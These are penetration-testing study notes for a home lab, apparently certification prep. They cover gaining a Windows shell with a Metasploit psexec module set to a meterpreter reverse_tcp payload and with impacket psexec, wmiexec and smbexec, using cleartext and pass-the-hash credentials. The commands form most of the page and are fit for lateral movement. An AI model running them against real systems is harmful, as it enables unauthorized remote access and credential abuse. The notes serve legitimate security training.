Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

Gaining Shell Access

  1. Do it with the cracked password (LLMNR and Cracking captured Hashes)

Metasploit

search psexec
use 4 #(exploit smb psexec)
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.218.138
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
options #to review everything
show targets
set target 1 #not needed, just as a concept

psexec.py:

psexec.py MARVEL/fcastle:'Password1'@192.168.218.138
OR
psexec.py MARVEL/fcastle:@192.168.218.139
#and password when prompted
psexec.py administrator@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
  1. Do it with a hash (SMB Relay Attacks (NTLM))
set smbuser administrator
unset smbdomain
set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Hash explained:

Hash: whole hash is needed for relay or passing the hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::

LM:

aad3b435b51404eeaad3b435b51404ee

NT: (only need this portion for cracking)

7facdc498ed1680c4fd1448319a8c04f

if psexec is getting blocked, you can use:

wmiexec.py administrator@192.168.218.138 -hashes 7facdc498ed1680c4fd1448319a8c04f

OR

smbexec.py administrator@192.168.218.138 -hashes 7facdc498ed1680c4fd1448319a8c04f